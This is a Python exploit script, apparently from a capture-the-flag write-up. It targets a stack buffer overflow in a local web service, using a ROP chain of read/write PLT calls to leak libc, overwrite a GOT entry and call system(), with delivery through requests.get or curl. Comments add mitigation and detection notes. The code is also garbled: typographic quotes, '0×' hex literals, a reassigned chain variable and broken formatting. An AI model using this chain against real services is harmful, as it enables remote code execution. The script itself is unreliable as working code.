
#!/usr/bin/python
# Write-up script for a stack buffer overflow in a small service on
# localhost:9999 (HTB "rabbit" / "Smashitup" wiki page).  An over-long
# request path overruns a fixed-size stack buffer; the layout below
# (filler, saved RBX, saved RBP, then the return-address area) is what the
# author measured.  Every PLT/gadget address is hard-coded while libc is
# described as randomised, so the target is presumably a non-PIE binary with
# a writable GOT and no stack canary -- confirm against the binary's
# hardening flags (checksec-style output) before relying on that reading.
#
# Defender's view: each of those properties maps to one mitigation.  A stack
# protector (canary) catches the saved-register/return overwrite; PIE
# randomises the PLT and gadget addresses that are fixed constants here;
# full RELRO (-z relro -z now) makes the GOT read-only so a write primitive
# aimed at the pointer table has nothing to hit; and bounds-checking the
# request buffer removes the underlying bug.  Detection-wise, a request
# path several hundred bytes long with a long run of a single repeated byte
# is an easy signature for the service's logs or a WAF.
import os, sys, socket
import struct
import requests

#cmd = sys.argv1+"\0"
cmd = ‘ls’

#payload for Option 1: GET request, needs some filler or err – ‘A’ * 4 to be taken off buffer
payload = r’http://localhost:9999/\AAAA’

#Payload for Option 2: CURL
#payload = ’’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
# NOTE(review): the 535-vs-536 discrepancy is an empirical measurement by the
# author; the 4 bytes are the ‘AAAA’ already placed in the URL above.
payload += ‘A’ * (535 – 4)

#overwrite RBX – offset 536
payload += ‘B’ * 8

#overwrite RBP – offset 544
payload += ‘C’ * 8

#fill before start of RSP – offset 568
payload += ‘D’ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
# The chain below is built in a separate variable and appended to the
# URL payload further down; "PPPR" is the author's label for a
# pop/pop/pop/ret gadget used to consume the three argument slots.
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 0) #stdin
someother += struct.pack(“<I”, 0×000602e28) #.dynamic addr
someother += struct.pack(“<I”, len(cmd)) #len of cmd

#leak address of read() in randomised libc
# Reading the GOT entry back over stdout is what lets the author defeat
# libc ASLR; full RELRO would not stop this read, only the write below.
someother += struct.pack(“<I”, 0×400c50) #write() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 1) #stdout
someother += struct.pack(“<I”, 0×000603088) #read() in GOT
someother += struct.pack(“<I”, 8) #len

#call read@plt to overwrite the ptr stored in GOT
# This is the step that full RELRO (-z relro -z now) defeats: with a
# read-only GOT the write faults instead of redirecting the next call.
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 0) #stdin
someother += struct.pack(“<I”, 0×000603088) #read() in GOT
someother += struct.pack(“<I”, 8) #len

#call read@plt with address of system() in libc
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<I”, 0×000602e28) #.dynamic addr system()

#padding – continue filler, writing into RSP
#payload += ‘E’ * 135
# Total length past the saved registers is kept constant at 135 bytes by
# padding whatever the chain does not fill.
payload = payload + someother
payload += ‘E’ * (135 – len(someother))

  1. Payload delivery Option1: requests.get #
    r = requests.get(payload)
    print(r.status_code)
    print(len(payload))
    print®
  1. Payload delivery Option2: system cmd curl #
    #print(“Sending payload of total length {}”.format(len(payload)))
    #system(“/usr/bin/curl -g localhost:9999/\”" +payload + “\”")